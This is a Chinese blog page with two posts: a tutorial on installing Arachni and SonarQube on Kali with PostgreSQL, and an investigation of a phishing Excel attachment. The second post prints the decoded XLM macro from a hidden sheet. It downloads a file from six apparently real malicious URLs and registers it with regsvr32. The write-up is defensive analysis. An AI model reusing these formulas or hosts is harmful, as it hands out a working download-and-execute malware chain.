<p style="font-family: arial; font-size: 14pt; margin-bottom: 8px; text-indent: 2em;">筆者是從Kali-Org直接下載現成的<a href="https://www.kali.org/get-kali/#kali-virtual-machines" target="_blank">VMware虛擬機映像檔</a>壓縮檔,下載後解壓縮,然後用VMware workstation Player開啟,可以省掉安裝虛擬的過程,也可簡化教學步驟。</p><p style="font-family: arial; font-size: 14pt;">Kali VM預設的帳號和密碼都是「kali」此帳號非系統管理員(root),很多指令必須藉由sudo讓kali暫時以系統管理員角色來執行。</p>
<p style="font-family: arial; font-size: 14pt; margin-bottom: 8px; text-indent: 2em;">進入Kali後,第一件事是執行系統更新,請開啟一個終端機(或稱主控台),並執行「<span style="background-color: black;"> <span style="color: #cccccc;">sudo apt updage && sudo apt upgrade -y </span></span>」(參考下圖)</p>
<p style="font-family: arial; font-size: 14pt; margin-bottom: 8px; text-indent: 2em;">接著以「<span style="background-color: black;"> </span><span style="background-color: black; color: #cccccc;">sudo service --status-all | grep post </span>」查看postgresql是否已啟動,前頭是 [ - ]表示未啟動,是 [ + ]表示已啟動。如果未啟動,請以「<span style="background-color: black;"><span style="color: #cccccc;"> sudo systemctl enable postgresql </span></span>」將它設成開機後自動啟動,並以「<span style="background-color: black; color: #cccccc;"> sudo systemctl start postgresql </span>」立即啟動postgressql服務。</p><p style="font-family: arial; font-size: 14pt;"></p><div class="separator" style="clear: both; font-family: arial; font-size: 14pt; text-align: center;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEh1BtuaD_47km2QWazvldu_dKIIeGoUs_nYHwW_9YI7xUUiFio5OzVJB73H0adM3UCFFJ5YTxUlP-u8PfcDgAfiMpQLQQ9qu72hJxlHka0i1_XKopG_yi-RuhESjVcnmSRgC0k9cnB1y3QqDNru482PIApvmzBEU3wMO9yY53iqebdsKbZrBojoVjju8Q" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="440" data-original-width="505" src="https://blogger.googleusercontent.com/img/a/AVvXsEh1BtuaD_47km2QWazvldu_dKIIeGoUs_nYHwW_9YI7xUUiFio5OzVJB73H0adM3UCFFJ5YTxUlP-u8PfcDgAfiMpQLQQ9qu72hJxlHka0i1_XKopG_yi-RuhESjVcnmSRgC0k9cnB1y3QqDNru482PIApvmzBEU3wMO9yY53iqebdsKbZrBojoVjju8Q=s16000" /></a></div></div>
<p style="font-family: arial; font-size: 14pt; margin-bottom: 8px; text-indent: 2em;">確認PostgreSQL啟動後,便可進行後續工作。</p>
<p style="font-family: arial; font-size: 14pt;"><b><span style="color: #990000; font-size: medium;">貳、設定PostgreSQL資料庫</span><span> </span></b><span style="text-indent: 37.3333px;">(參考</span><a href="https://medium.com/codex/install-sonarqube-on-ubuntu-21-using-postgresql-e2201fce4bf0" style="text-indent: 37.3333px;" target="_blank">這篇文章</a><span style="text-indent: 37.3333px;">)</span></p>
<p style="font-family: arial; font-size: 14pt; margin-bottom: 8px; text-indent: 2em;">arachni和SonarQube都支援PostgreSQL資料庫,而且Kali也已預安裝此資料系統,只須少少步驟設定,便可啟用。</p>
<p style="font-family: arial; font-size: 14pt; margin-bottom: 8px; text-indent: 2em;">確認PostgreSQL服務啟動後,可參考本段建立所需的資料庫及設定。</p>
<div style="background-color: black; border: 1px solid red; font-family: arial; font-size: 12pt; line-height: 110%; margin: 4px; padding: 0px 4px 0px 12px;">
<p><span style="color: #cccccc;">sudo passwd postgres </span><span style="color: #04ff00;">#為postgres 設定新密碼(預設是無密碼)<br /> #接著輸入新密碼及再次確認新密碼,</span><span style="color: #ffa400;">請記住新密碼</span></p>
<p><span style="color: #cccccc;">su - postgres </span><span style="color: #04ff00;"> #切換成postgres角色的作業環境<br /><span style="color: #cccccc;">密碼: <</span><i style="color: #cccccc;">輸入postgres的密碼</i><span style="color: #cccccc;">></span></span></p><p><span style="color: #fcff01;">createuser kali</span><span style="color: #cccccc;"> </span><span style="color: #04ff00;">#在PostgreSQL 建立新使用者,可自定使用者名稱</span></p>
<p><span style="color: #fcff01;">psql </span><span style="color: #cccccc;"> </span><span style="color: #04ff00;">#進入PostgreSQL 資料庫命令列環境</span></p>
<p><span style="color: #f4cccc;">ALTER USER kali WITH ENCRYPTED password 'kali'; <br /> </span><span style="color: #04ff00;">#為kali設定密碼<br /></span><span style="color: #04ff00;"> #這裡延用 kali,是為了方便操作,也可以另定密碼,<br /></span><span style="color: #04ff00;"> #此密碼在OS的kali密碼並不是同一組</span></p><p><span style="color: #f4cccc;">CREATE DATABASE sonar WITH ENCODING 'UTF8' OWNER kali TEMPLATE=template0;<br /> </span><span style="color: #04ff00;">#為sonar(白箱工具)建立資料庫,名為 sonar,<br /> # 並將此資料庫擁有者設為kali (上面建立的 kali,不是OS的帳號 kali)</span></p>
<p><span style="color: #cccccc;">\q </span><span style="color: #04ff00;">#離開 PostgreSQL 資料庫命令列環境</span></p>
<p><span style="color: #fcff01;">exit</span><span style="color: #cccccc;"> </span><span style="color: #04ff00;">#離開PostgreSQL管理環境</span></p>
</div>
<p style="font-family: arial; font-size: 14pt;"><br /></p><p style="font-family: arial; font-size: 14pt;"><span><b style="font-size: large;"><span style="color: #990000;">叁、安裝arachni</span></b> (參考<a href="https://kknews.cc/zh-tw/code/8knvk6n.html" target="_blank">這篇文章</a>)</span></p>
<p style="font-family: arial; font-size: 14pt;">將 arachni安裝於 /opt 目錄,指令如下:</p>
<div style="background-color: black; border: 1px solid red; font-family: arial; font-size: 12pt; line-height: 110%; margin: 4px; padding: 0px 4px 0px 12px;">
<p style="font-family: arial;"><span style="color: #cccccc;">wget /P /tmp https://github.com/Arachni/arachni/releases/download/v1.6.1.3/arachni-1.6.1.3-0.6.1.1-linux-x86_64.tar.gz </span><span style="color: #04ff00;">#將arachni下載至 /tmp 目錄</span></p>
<p style="font-family: arial;"><span style="color: #cccccc;">cd /opt </span><span style="color: #04ff00;">#切換到 /opt 目錄,arachni 將安裝至此</span></p>
<p style="font-family: arial;"><span style="color: #cccccc;">sudo tar -zxvf /tmp/arachni-1.6.1.3-0.6.1.1-linux-x86_64.tar.gz </span><span style="color: #04ff00;">#將檔案解壓至 /opt</span></p>
<p><span style="color: #cccccc; font-family: arial;">cd arachni-1.6.1.3-0.6.1.1/.system/arachni-ui-web/db/</span><span style="color: #cccccc; font-family: arial;"> </span><span style="color: #04ff00; font-family: arial;">#切換到arachni的資料庫目錄</span></p><p style="font-family: arial;"><span style="color: #cccccc;">chmod 666 production.sqlite3 </span><span style="color: #04ff00;"># 設定預設使用的sqlite資料庫的讀寫權限</span></p>
</div>
<p style="font-family: arial; font-size: 14pt; text-indent: 2em;">完成安裝後,請以下列命令啟動arachni web伺服器:</p>
<div style="background-color: black; border: 1px solid red; font-family: arial; font-size: 12pt; line-height: 110%; margin: 4px; padding: 0px 4px 0px 12px;">
<p><span style="color: #cccccc; font-family: arial;">cd /opt/arachni-1.6.1.3-0.6.1.1/bin </span><span style="color: #04ff00;"># 切換到arachni的bin目錄</span></p>
<p style="font-family: arial;"><span style="color: #cccccc;">./arachni_web -o 0.0.0.0 -p 8888 </span><span style="color: #04ff00;">#啟動arachni</span></p><p style="font-family: arial;"><span style="color: #04ff00;"> # -o 指定來源網卡,0.0.0.0 表示此機器上的所有網卡<br /> # 8888 表示連線端口,瀏覽器可以 http://VM-IP:8888 連線。</span></p>
</div>
<p style="font-family: arial; font-size: 14pt; margin-bottom: 8px; text-indent: 2em;">啟動arachni web serve後,從Kali裡的瀏覽器連線<span style="background-color: #fcff01;"><span style="color: red;">http://127.0.0.1:8888</span></span>,如果出現登入畫面,就表示安裝成功了。arachnii預設的兩組帳密分別是:</p>
<div style="border: 1px solid gray; font-family: arial; margin: 0px 2em; padding: 0px 2em;"><span style="color: #0b5394;">admin@admin.admin</span> / <span style="color: #990000;">administrator</span><br /><span style="color: #0b5394;">user@user.user</span> / <span style="color: #990000;">regular_user</span></div>
<p style="font-family: arial; font-size: 14pt; text-indent: 2em;"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEiAPGgvi7uCV4eWHf91PxTt9-wfY1cfQYaUGp91yyvdX9_fTxCtO94X8DEKICzU2Zc3zzg3wo_G-nRilFPLEZ00db5_K5VdENnFBymYIToD1dgQaX8kFy_ioyn26HybjKopYRpmPz9nr8wlaV5WZlK4-hWlunouE0KrdEwmC7lqz-wwfkw1kkAki9QbXg" style="margin-left: 1em; margin-right: 1em;"><img alt="看到登入畫面,表示arachni安裝成功" data-original-height="560" data-original-width="661" height="339" src="https://blogger.googleusercontent.com/img/a/AVvXsEiAPGgvi7uCV4eWHf91PxTt9-wfY1cfQYaUGp91yyvdX9_fTxCtO94X8DEKICzU2Zc3zzg3wo_G-nRilFPLEZ00db5_K5VdENnFBymYIToD1dgQaX8kFy_ioyn26HybjKopYRpmPz9nr8wlaV5WZlK4-hWlunouE0KrdEwmC7lqz-wwfkw1kkAki9QbXg=w400-h339" width="400" /></a></div><div style="text-align: center;">看到登入畫面,表示arachni安裝成功</div>
<p style="font-family: arial; font-size: 14pt; text-indent: 2em;">上面的安裝方式是使用arachni自帶的sqllite3資料庫,如果想使用PostgreSQL資料庫來保存arachni執行結果,可按下列步驟調整:</p>
<div style="background-color: black; border: 1px solid red; font-family: arial; font-size: 12pt; line-height: 110%; margin: 4px; padding: 0px 4px 0px 12px;">
<p><span style="color: #cccccc;">cd /opt/arachni-1.6.1.3-0.6.1.1/.system/arachni-ui-web/config/ </span><span style="color: #04ff00;">#切換到 config 目錄</span></p>
<p><span style="color: #cccccc;">sudo mv database.yml database.yml.sqlite3 </span><span style="color: #04ff00;"> #備份原來sqlite3的連線組態</span></p>
<p><span style="color: #cccccc;">sudo mv database.yml.pgsql database.yml </span><span style="color: #04ff00;"> # 啟用postgresql的連線組態</span></p>
<p><span style="color: #cccccc;">cat database.yml </span><span style="color: #04ff00;">#查看連線組態的內容</span><br /><span style="color: #cccccc;"> </span><span style="color: #04ff00;">#要注意裡頭 username: </span><span style="color: #ffa400;">arachni</span><span style="color: #04ff00;"> 及 password: </span><span style="color: #ffa400;">secret</span><span style="color: #04ff00;"> 的值</span></p><p><span style="color: #cccccc;">cd ~ </span><span style="color: #04ff00;"> #回到kali的家目錄</span></p>
</div>
<p style="font-family: arial; font-size: 14pt; text-indent: 2em;">接著設定arachni的資料庫。假如一開始就打算讓arachni使用PostgreSQL資料庫,可以在步驟貳完成以下的資料庫設置。</p>
<div style="background-color: black; border: 1px solid red; line-height: 110%; margin: 4px; padding: 0px 4px 0px 12px;">
<p style="font-family: arial; font-size: 12pt;"><span style="color: #cccccc;">su - postgres </span><span style="color: #04ff00;"> #切換成postgres角色的作業環境<br /><span style="color: #cccccc;">密碼: <</span><i style="color: #cccccc;">輸入postgres的密碼</i><span style="color: #cccccc;">></span></span></p><p style="font-family: arial; font-size: 12pt;"><span style="color: #fcff01;">createuser arachni</span><span style="color: #cccccc;"> </span><span style="color: #04ff00;"># 配合database.yml裡的username值,建立新使用者</span></p><p style="font-family: arial; font-size: 12pt;"><span style="color: #fcff01;">psql </span><span style="color: #cccccc;"> </span><span style="color: #04ff00;">#進入PostgreSQL 資料庫命令列環境</span></p><p style="font-family: arial; font-size: 12pt;"><span style="color: #f4cccc;">ALTER USER arachni WITH ENCRYPTED password 'secret'; <br /> </span><span style="color: #04ff00;"># 配合database.yml裡的password,為arachni帳號設定密碼</span></p><p style="font-size: 12pt;"><span><span style="color: #f4cccc; font-family: arial;">CREATE DATABASE arachni_production WITH ENCODING 'UTF8' OWNER arachni;<br /> </span><span style="color: #04ff00; font-family: arial;">#建立</span><span style="color: #ffa400; font-family: arial;">arachni_production</span><span style="color: #04ff00; font-family: arial;">資料庫,並將擁有者設為</span><span style="color: #ffa400; font-family: arial;">arachni</span></span></p><p><span style="color: #ead1dc; font-family: arial;">ALTER USER arachni CREATEDB; </span><span style="color: #04ff00; font-family: arial;">#賦予arachni建立DB的權限</span></p><p style="font-size: 12pt;"><span style="color: #cccccc; font-family: arial; font-size: 12pt;">\q </span><span style="color: #04ff00; font-family: arial; font-size: 12pt;">#離開 PostgreSQL 資料庫命令列環境</span></p><p style="font-family: arial; font-size: 12pt;"><span style="color: #fcff01;">exit</span><span style="color: #cccccc;"> </span><span style="color: #04ff00;">#離開PostgreSQL管理環境</span></p>
</div>
<p style="font-family: arial; font-size: 14pt;">完成arachni的資料庫設定後,還需要執行</p>
<div style="background-color: black; border: 1px solid red; color: #cccccc; font-family: arial; font-size: 12pt; line-height: 140%; padding: 4px;"> cd /opt/arachni-1.6.1.3-0.6.1.1/bin<br /> ./arachni_web_task db:setup </div>
<p style="font-family: arial; font-size: 14pt;">來設定arachni_production的資料庫綱要。</p>
<p style="font-size: 14pt; text-indent: 2em;"><br /></p>
<p style="font-family: arial; font-size: 14pt;"><span style="color: #990000; font-size: medium;">
<b>肆、安裝SonarQube</b></span></p>
<p style="font-family: arial; font-size: 14pt; text-indent: 2em;"><a href="https://www.sonarsource.com/products/sonarqube/downloads/" target="_blank">這裡</a>有SonarQube的所有下載檔,筆者選用免費的社群版,並安裝於 /opt目錄。</p>
<div style="background-color: black; border: 1px solid red; line-height: 110%; margin: 4px; padding: 0px 4px 0px 12px;">
<p style="color: #cccccc; font-family: arial; font-size: 12pt;">wget -P /tmp https://binaries.sonarsource.com/Distribution/sonarqube/sonarqube-9.9.0.65466.zip <span style="color: #04ff00;"># 將SonarQube下載到 /tmp 目錄</span></p>
<p style="color: #cccccc; font-family: arial; font-size: 12pt;">cd /opt <span style="color: #04ff00;"># 將工作目錄切換到 /opt</span></p>
<p style="color: #cccccc; font-family: arial; font-size: 12pt;">sudo unzip /tmp/sonarqube-9.9.0.65466.zip <span style="color: #04ff00;">#解壓縮 SonarQube</span></p>
<p style="color: #cccccc; font-family: arial; font-size: 12pt;">sudo chown -R kali:kali /opt/sonarqube-9.9.0.65466/* <span style="color: #04ff00;"># 變更sonarqube的權限設定</span></p>
<p style="color: #cccccc; font-family: arial; font-size: 12pt;">sudo chmod 777 -R /opt/sonarqube-9.8.0.63668/temp # <span style="color: #04ff00; font-family: arial;">#變更temp的權限設定</span></p>
<p style="color: #cccccc; font-family: arial; font-size: 12pt;">sudo nano /opt/sonarqube/conf/sonar.properties <span style="color: #04ff00;">#編輯sonar 組態檔</span></p>
<div style="background-color: #cccccc; color: #660000; font-family: arial; font-size: 12pt; margin: 4px; padding: 4px;">
<p># DATABASE <span style="color: #0b5394;">#有關資料庫連線的設定</span></p>
<p>sonar.jdbc.username=kali <span style="color: #0b5394;">#帳號,見步驟貳的設定</span></p>
<p>sonar.jdbc.password=kali <span style="color: #0b5394; font-size: 12pt;">#帳號,見步驟貳的設定</span></p>
<p>sonar.jdbc.url=jdbc:postgresql://localhost/sonar <span style="color: #0b5394;">#sonar是步驟貳建立的資料庫</span></p>
<p># WEB SERVER <span style="color: #0b5394;">#有關Web Server的設定</span></p>
<p>sonar.web.host=0.0.0.0 <span style="color: #0b5394;">#指定可連入的網卡,0.0.0.0表所有IP皆供連線</span></p>
<p>sonar.web.port=9000 <span style="color: #0b5394;">#指定監聽連入的端口</span></p>
</div>
<p style="color: #cccccc; font-family: arial; font-size: 12pt;"></p>
<p><span style="color: #cccccc; font-family: arial;">/opt/sonarqube-9.9.0.65466/bin/linux-x86-64/sonar.sh console </span><span style="color: #04ff00; font-family: arial;">#啟動SonarQube</span></p>
</div>
<p style="font-family: arial; font-size: 14pt; text-indent: 2em;">啟動SonarQube伺服器後,由Kali裡的瀏覽器連線<span style="background-color: #fcff01;"><span style="color: red;">http://127.0.0.1:9000</span></span>,若出現登入畫面,就表示安裝成功了。</p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjaN6bbl7vTjPwSBEOYho2SXqxhEdeBwvjxkfEcpOgFvlQ-nXOB6W6tt6O8jtXIfWN-f6RvySM9-KyqfIrzmw0fln2RmAAG8jzlQ_fv2U2rMLS-UO9o9tAZ1aZ0o9DoVYw0LQoJBseucGqNnlEslw5yf14h3-JRcdC45BDzEP8OEbx0HV2Pa0LnI1kACA" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="369" data-original-width="660" height="179" src="https://blogger.googleusercontent.com/img/a/AVvXsEjaN6bbl7vTjPwSBEOYho2SXqxhEdeBwvjxkfEcpOgFvlQ-nXOB6W6tt6O8jtXIfWN-f6RvySM9-KyqfIrzmw0fln2RmAAG8jzlQ_fv2U2rMLS-UO9o9tAZ1aZ0o9DoVYw0LQoJBseucGqNnlEslw5yf14h3-JRcdC45BDzEP8OEbx0HV2Pa0LnI1kACA" width="320" /></a></div><div style="text-align: center;">看到登入畫面,表示SonarQube安裝成功</div>
<p style="font-family: arial; font-size: 14pt;">至此已完成Arachni及SonarQube安裝,有空再介紹這兩套工具的基本用法。</p>
<hr style="border: 2px solid blue;" />
<p style="font-family: arial; font-size: 14pt; margin-left: 2em; text-indent: -2em;"><b><span style="color: #cc0000;">註:</span></b>若一切從頭安裝,必須逐一安裝java、PostgreSQL、Ruby,利用現成的Kali VM,將心思專注於arachni及SonarQube的安裝,省卻許多除錯程序,可大大提高成功率。</p>
<hr style="border: 2px solid blue;" />
<p style="margin: 0px;">白箱掃描範例:</p>
<p style="margin-left: 2em; margin-top: 0px;"><a href="https://atic-tw.blogspot.com/2023/09/sonarqubedotnet-core.html" target="_blank">掃描dotNet Core專案源碼</a><br /><a href="https://atic-tw.blogspot.com/2023/09/sonarqubenetframework.html">
掃描.netFramework專案源碼</a><br /><a href="https://atic-tw.blogspot.com/2023/09/sonarqube-maven.html" target="_blank">掃描maven專案源碼</a></p>
</div>雅技資訊技術http://www.blogger.com/profile/06948808120337987647noreply@blogger.com37QJ35CW5+Q522.1968905 121.4079504-8.673183144827405 86.2517004 53.0669641448274 156.5642004tag:blogger.com,1999:blog-1967825056283652287.post-17289761020610377642022-05-15T11:55:00.005+08:002022-05-19T13:34:06.506+08:00社交工程事件調查<div style="border: 3px solid rgb(8, 108, 197); line-height: 150%; padding: 8px;">
<p style="font-size: 14pt; margin-bottom: 8px; text-indent: 2em;">
參與滲透測試小組好幾年了,第一次遇到真正的社交工程攻擊。</p>
<p style="font-size: 14pt; margin-bottom: 8px; text-indent: 2em;">前天(<span style="font-family: arial;">2022/05/13</span>)甫上班,同事就來電說他被釣魚了,叫我幫忙分析郵件裡的載荷。這位同事很機警,並沒有打開郵件,而是直接將它存成 <span style="font-family: arial;">.msg</span>(<span style="font-family: arial;">outlook</span>格式的郵件檔),我用<span style="font-family: arial;">Outlook</span>的純文字模式開啟此封郵件,裡頭有一支<span style="font-family: arial;">Excel</span>檔(<span style="font-family: arial;">.xls</span>)。一下載此<span style="font-family: arial;">xls</span>就被防載軟體砍掉,覺得有必要看看它有什麼機關?</p>
<p style="font-size: 14pt; margin-bottom: 8px; text-indent: 2em;">用<span style="font-family: arial;">EXCEL</span>開啟此<span style="font-family: arial;">xls</span>時,會出現<span style="color: #cc0000;">停用巨集的安全性警告</span>(圖1),表示裡頭有巨集,下意識就切到<span style="font-family: arial;">VBScript</span>編輯環境,但沒有發現任何巨集、也沒有要求輸入保護密碼,心中疑惑重重!想起<span style="color: #351c75;"><u>林易澍</u></span>老師教過「<span style="color: #38761d; font-family: arial;">OfficeMalScanner</span>」可以分離出被保護的巨集,但執行結果是「<span style="color: #cc0000; font-family: arial;">No VB-Marco code found!</span>」(圖2)。</p><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgddQYYevMjDJSj4LxU_I0kAo9fIkP8NU57lsZ3qkc25nMsCZMIrGhkM1oXZeFxbBddJzggiwb1saTmoUuEu6FuKq5yxlxdasj3KYUrzE3GHePTCvgkECm7_And-o8_9dWFcm50w4Gz_uk_ByXPPQk0JzUIj-NBdkLpPBdm7ipJ_KcC9LEqVqm-TSR-ZQ/s887/pic01.png" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="341" data-original-width="887" height="154" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgddQYYevMjDJSj4LxU_I0kAo9fIkP8NU57lsZ3qkc25nMsCZMIrGhkM1oXZeFxbBddJzggiwb1saTmoUuEu6FuKq5yxlxdasj3KYUrzE3GHePTCvgkECm7_And-o8_9dWFcm50w4Gz_uk_ByXPPQk0JzUIj-NBdkLpPBdm7ipJ_KcC9LEqVqm-TSR-ZQ/w400-h154/pic01.png" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">圖1:出現安全性警告</td></tr></tbody></table><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAB_r7tGkkhOB_wDIswYwDyhT9DRjjoT01gerXAI7hmPXAd3ZjO-kGYD6dB9pnCwDX_SLVJg5bi_k_QGP0FTpvxiigqCHdsQNFyX8BqM_njWb1okrRwsvIC8K5LSQSu7o3o0FQzOkDiIF8ynFHMGZcFknlfu2CgKA6fFmnshqKnIzxuhe3ikWoyT1HEQ/s824/pic02.png" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="408" data-original-width="824" height="198" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAB_r7tGkkhOB_wDIswYwDyhT9DRjjoT01gerXAI7hmPXAd3ZjO-kGYD6dB9pnCwDX_SLVJg5bi_k_QGP0FTpvxiigqCHdsQNFyX8BqM_njWb1okrRwsvIC8K5LSQSu7o3o0FQzOkDiIF8ynFHMGZcFknlfu2CgKA6fFmnshqKnIzxuhe3ikWoyT1HEQ/w400-h198/pic02.png" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">圖2:OfficeMalScanner找不到巨集</td></tr></tbody></table><br /><p style="font-size: 14pt; margin-bottom: 8px; text-indent: 2em;"><span style="font-size: 14pt; text-indent: 2em;">再端詳此<span style="font-family: arial;">xls</span>,發現只有一張試算表,上面就只有一張圖片,原本以為是想利用圖片騙人點擊,但查看圖片的屬性,也沒發現和巨集有關聯。無意中發現工作列左方的「<span style="color: #2b00fe;">名稱框</span>」有蹊蹺(圖3),不管選哪一個名稱都不會跳到名稱所代表的儲存格,也就是說「<span style="color: #cc0000;">有東西被隱藏起來</span>」,再回到<span style="font-family: arial;">VBScript</span>編輯環境,真的發現有<span style="color: #cc0000;">四</span>張工作表,但試算表環境只能看到<span style="color: #cc0000;">一</span>張(圖4)。</span></p><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxylR2NwerCvoupwpfrRnkCecy7v9PjhAIISyiLFKYtDUJYZ8d7poevIcQ-8q-vq9lar7KxnIQwVGNHHqJQ9QLBkxk-SyINmFy-q2WmJxYHzBPwdj2V_K2RWoj1VbHOF2ZJDhqlrGMBSqAhrxCXPQLRKqqZmSx6I8U7F14QrPZn-phy5e8NFKG8CzZhA/s819/pic03.png" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="472" data-original-width="819" height="230" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxylR2NwerCvoupwpfrRnkCecy7v9PjhAIISyiLFKYtDUJYZ8d7poevIcQ-8q-vq9lar7KxnIQwVGNHHqJQ9QLBkxk-SyINmFy-q2WmJxYHzBPwdj2V_K2RWoj1VbHOF2ZJDhqlrGMBSqAhrxCXPQLRKqqZmSx6I8U7F14QrPZn-phy5e8NFKG8CzZhA/w400-h230/pic03.png" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">圖3:名稱卻找不到對應的儲存格</td></tr></tbody></table><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0RfvUl9uvpAhEyw5FuIO9rcaoY24Jb_y5xoq4Iw-qEa4HIOeSoFr8zctZSJzo-rsiLEi285vnZjDPctdtuR7sWRuFgaUegCHs9zCdpza71uxDbVDt-otYuAGnVVt6Nl9CS-mjG1x84m7Exu6f2nBdvcqzjie0qCI8rNwBxUK6mVhtYk7t8n7KIBjKUg/s1186/pic04.png" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="656" data-original-width="1186" height="221" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0RfvUl9uvpAhEyw5FuIO9rcaoY24Jb_y5xoq4Iw-qEa4HIOeSoFr8zctZSJzo-rsiLEi285vnZjDPctdtuR7sWRuFgaUegCHs9zCdpza71uxDbVDt-otYuAGnVVt6Nl9CS-mjG1x84m7Exu6f2nBdvcqzjie0qCI8rNwBxUK6mVhtYk7t8n7KIBjKUg/w400-h221/pic04.png" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">圖4:在VBScript編輯環境可看到被隱藏的工作表</td></tr></tbody></table><br /><p style="font-size: 14pt; margin-bottom: 8px; text-indent: 2em;"><span style="font-size: 14pt; text-indent: 2em;">回到試算表環境,在下方頁籤點擊滑鼠右鍵,一一將隱藏的工作表還原,真的有五張工作表吔!可是~~可是~~,在<span style="font-family: arial;">VBScript</span>編輯環境只看到四張表,哦!少了一張,那一張應該就是關鍵了!上網搜尋,的確有人提到</span><a href="http://forum.twbts.com/viewthread.php?tid=77&extra=" rel="nofollow" style="font-size: 14pt; text-indent: 2em;" target="_blank">去除<span style="font-family: arial;">VBScript</span>編輯環境裡的<span style="font-family: arial;">sheet</span>之方法</a><span style="font-size: 14pt; text-indent: 2em;">(但沒有說如何復原)。</span></p>
<p style="font-size: 14pt; margin-bottom: 8px; text-indent: 2em;">復原的<span style="font-family: arial;">Vv1</span>、<span style="font-family: arial;">Vv2</span>、<span style="font-family: arial;">Vv3</span>這三張工作表只是一些參考文字,重點在<span style="color: #cc0000; font-family: arial;">FRHJDJDI</span>這張工作表上,這張也是在<span style="font-family: arial;">VBScript</span>編輯環境被去除的工作表。</p>
<p style="font-size: 14pt; margin-bottom: 8px; text-indent: 2em;"><span style="font-family: arial;">FRHJDJDI</span>只在<span style="color: #cc0000; font-family: arial;">F10</span>這一格有公式,它是利用<span style="font-family: arial;">Vv1</span>、<span style="font-family: arial;">Vv2</span>、<span style="font-family: arial;">Vv3</span>三張表的內容兜成公式文字,再利用<span style="font-family: arial;">FORMULA()去</span>執行,但<span style="font-family: arial;">FORMULA()</span>並非<span style="font-family: arial;">Excel</span>的內建公式,亦即它是攻擊者製作的巨集(<span style="font-family: arial;">VBScript</span>),經分析,<span style="font-family: arial;">FRHJDJDI</span>的<span style="font-family: arial;">F10</span>儲存格是要執行下列動作:</p>
<div style="color: #1aac46; font-size: 9pt; line-height: 100%; margin: 0px;">
<pre style="margin-left: 2em; text-indent: -2em;">=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.itesmeitic.com/term/IFjx5ElE0ldr8wDDHjub/","..\wurod.ocx",0,0)</pre>
<pre style="margin-left: 2em; text-indent: -2em;">=IF(HRHRE1<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.ingonherbal.com/application/PhEbceg4Tx/","..\wurod.ocx",0,0))</pre>
<pre style="margin-left: 2em; text-indent: -2em;">=IF(HRHRE2<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://ftp.colibriconstruction.net/cc/KHieqeOsagkmlGIuXc56/","..\wurod.ocx",0,0))</pre>
<pre style="margin-left: 2em; text-indent: -2em;">=IF(HRHRE3<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://commune-ariana.tn/sites/3BvaCmo/","..\wurod.ocx",0,0))</pre>
<pre style="margin-left: 2em; text-indent: -2em;">=IF(HRHRE4<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://dmaicinnovations.com/Swift-5.0.2/jEtePB/","..\wurod.ocx",0,0))</pre>
<pre style="margin-left: 2em; text-indent: -2em;">=IF(HRHRE5<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://drcreative.cz/images/DwThyQntyImCHk0tpba/","..\wurod.ocx",0,0))</pre>
<pre style="margin-left: 2em; text-indent: -2em;">=IF(HRHRE6<0, CLOSE(0),)</pre>
<pre style="margin-left: 2em; text-indent: -2em;">=EXEC("C:\Windows\System32\regsvr32.exe ..\wurod.ocx")</pre>
<pre style="margin-left: 2em; text-indent: -2em;">=RETURN()</pre>
</div>
<p style="font-size: 14pt; margin-bottom: 8px; text-indent: 2em;line-height: 150%;">原來此<span style="font-family: arial;">xls</span>是利用開啟活頁簿時,<span style="font-family: arial;">Excel</span>會<span style="color: #990000;">自動計算公式</span>的機制來執行惡意行為。從解析出來的公式,它會嘗試從六個來源下載木馬程式,只要有一個成功,就註冊成<span style="font-family: arial;">Active</span>元件,至於這支惡意程式的功能還需等待逆向工程分析。<span style="color: #38761d;">另一個未解的問題是被去除工作表,有沒有方法可以將它回復?</span></p>
<hr />
<p><span style="color: #cc0000;"><span style="font-size: medium;"><b>後記:</b></span></span></p>
<p style="font-size: 14pt; margin-bottom: 8px; text-indent: 2em;line-height: 150%;">感謝林易澍老師指導,原來這份檔案是使用Excel 4.0的巨集指令 (稱為xlm),自Excel 95起已棄用Excel 4.0的巨集指令,而已用VBA,但現行的Excel版本仍具備執行xlm能力。難怪找不出這份文件裡的vba程式碼,原來是我功力不足,找錯方向!</p>
